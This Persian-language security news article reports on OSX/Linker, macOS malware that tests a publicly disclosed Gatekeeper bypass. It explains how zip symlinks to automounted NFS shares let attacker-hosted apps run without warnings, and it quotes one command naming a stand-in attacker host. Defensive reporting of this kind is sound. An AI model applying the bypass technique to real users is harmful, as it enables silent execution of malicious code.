GateKeeper

محققان امنیت سایبری از Intego در مورد بهره‌برداری فعال از یک آسیب‌پذیری امنیتی وصله نشده در ویژگی امنیتی Gatekeeper در سیستم‌عامل اپل هشدار دادند که جزئیات و PoC آن نیز در اواخر ماه گذشته به‌طور علنی افشا شد.

هفته گذشته تیم Intego چهار نمونه از دژافزارهای جدید macOS را در VirusTotal کشف کرد[۱] که از یک آسیب‌پذیری دور زدن GateKeeper به‌منظور اجرای کد غیرقابل‌اعتماد در macOS سوءاستفاده می‌کرد، بدون اینکه هشدارهای لازم را به کاربران نشان دهد و یا اجازه آن‌ها را درخواست کند.

 بااین‌حال، این دژافزار تازه کشف‌شده OSX/Linker نام‌گذاری شده است و تاکنون در سطح اینترنت دیده نشده است و به نظر می‌رسد درحال‌توسعه باشد. گرچه نمونه‌ها از نقص وصله نشده‌ی دور زدن Gatekeeper استفاده کرده‌اند، اما هیچ برنامه مخربی را از سرور مهاجم بارگیری نمی‌کنند.

 طبق گفته Joshua Long ازIntego ، تا هفته گذشته، “سازنده این دژافزار صرفاً برخی از شناسایی‌های تشخیص آزمایش را انجام می‌داده است.”

Long در یک پست وبلاگ دراین‌باره گفت: “یکی از فایل‌ها با یک Apple Developer ID امضا شد (همان‌طور که در زیر توضیح داده شده است)، این مدرکی مبتنی بر این است که تصاویر دیسک OSX/Linker دست‌ساز توسعه‌دهندگان نرم‌افزارهای تبلیغاتی مزاحم OSX/Surfbuyer هستند.”

 بااین‌حال، ازآنجاکه نمونه این دژافزار به یک سرور از راه دور لینک می‌شود، می‌تواند برنامه غیرقابل‌اعتماد را نیز بارگیری کند و مهاجمان می‌توانند با جایگزین کردن برنامه نمونه مشخص‌شده با یک برنامه از نوع دژافزار روی سرور خود، همان نمونه‌های واقعی را نیز روی اهداف موردنظر توزیع کنند.

آسیب‌پذیری دور زدن Gatekeeper روی macOS

GateKeeper یک ویژگی امنیتی است که در macOS ایجاد شده است و امضای کد را اعمال می‌کند و برنامه‌های بارگیری شده را قبل از اجرای برنامه‌ها، تأیید می‌کند و به کاربران کمک می‌کند تا دستگاه‌های خود را نسبت به دیگر دژافزارها و سایر نرم‌افزارهای موذی محافظت کنند.

این بدان معناست که اگر برنامه‌ای را از طریق اینترنت بارگیری کنید، GateKeeper  فقط در صورت امضای گواهی معتبر صادرشده توسط اپل، اجازه اجرای آن را می‌دهد، در غیر این صورت به شما اجازه می‌دهد که اجرای آن را مجاز یا لغو کنید.

 بااین‌حال،Gatekeeper طوری طراحی شده است که درایوهای خارجی مثل USB یا HDD و اشتراک‌های شبکه را به‌عنوان “مکانه‌ای امن” در نظر بگیرد که از آن طریق کاربران می‌توانند هرگونه برنامه را بدون در نظر گرفتن بررسی‌ها و پیام‌های GateKeeper اجرا کنند.

Filippo Cavallarin، یک محقق امنیتی مستقل، در اواخر ماه گذشته توسط ترکیب این آسیب‌پذیری با دو ویژگی قانونی دیگر از سیستم‌عامل macOS راهی برای بهره‌برداری از این رفتار فاش کرد[۲].

  • بایگانی‌های zip می‌توانند شامل پیوندهای نمادین باشند که به یک مکان دلخواه اشاره می‌کنند، ازجمله automount endpoints
  • ویژگی automount در macOS می‌تواند به‌طور خودکار با دسترسی به یک مسیر “ویژه” یعنی با شروع “/net /” ، یک network shareرا از یک سرور از راه دور mountکند.

Cavallarin در یک پست وبلاگ دراین‌باره توضیح می‌دهد: به‌عنوان‌مثال، ls /net/evil-attacker.com/sharedfolder/  باعث خواهد شد که سیستم‌عامل محتوای” sharedfolder “را روی میزبان از راه دور (evil-attacker.com) با استفاده از NFS بخواند.”

همان‌طور که در یک اثبات ویدیویی نشان داده شده است[۳]، Cavallarin یک فایل ZIP را با یک لینک نمادین به یک شبکه تحت کنترل مهاجم لینک کرده است که macOS آن را automount می‌کند.

 هنگامی‌که یک قربانی بایگانی ZIP را باز کرده و پیوند را دنبال کند، به share شبکه تحت کنترل مهاجم که توسط Gatekeeper مورد اعتماد است، هدایت می‌شود و قربانی را فریب می‌دهد تا فایل‌های اجرایی موذی را بدون هیچ‌گونه اخطاری اجرا کند.

 این محقق دراین‌باره می‌گوید: “با روشی که  Finder طراحی شده است (پسوندهای .app را مخفی کرده و مسیر کامل را از نوار عنوان مخفی کرده)، این تکنیک را بسیار مؤثر و غیرقابل قابل‌مشاهده می‌کند.”

بااین‌حال، نمونه‌های دژافزار تازه کشف‌شده فایل‌های ZIP نیستند، بلکه فایل‌های تصویری دیسک با پسوند .dmg هستند که نشان می‌دهد “سازندگان دژافزار در حال آزمایش بودند تا ببینند آیا آسیب‌پذیری Cavallarin با تصاویر دیسک نیز کار می‌کند.”

 Cavallarin مسئولانه یافته‌های خود را در تاریخ ۲۲ فوریه ۲۰۱۹ به اپل گزارش داد اما اواخر ماه گذشته که این شرکت در مهلت افشای ۹۰ روزه نتوانست این آسیب‌پذیری را برطرف کند و شروع به نادیده گرفتن ایمیل‌های وی کرد، تصمیم گرفت این یافته‌ها را به‌طور علنی افشا کند.

 تا زمانی که اپل این مسئله را وصله کند، این محقق به مدیران شبکه توصیه کرد که ارتباطات NFS را با آدرس‌های IP  خارجی مسدود کنند و برای کاربران خانگی این مسئله همیشه بسیار مهم است که پیوست‌های ایمیل را از یک منبع ناشناخته، مشکوک یا غیرقابل‌اعتماد باز نکنند.

 

منابع

[۱] https://www.intego.com/mac-security-blog/osx-linker-new-mac-malware-attempts-zero-day-gatekeeper-bypass

[۲] https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass

[۳] https://youtu.be/m74cpadIPZY

[۴] https://thehackernews.com/2019/06/macos-malware-gatekeeper.html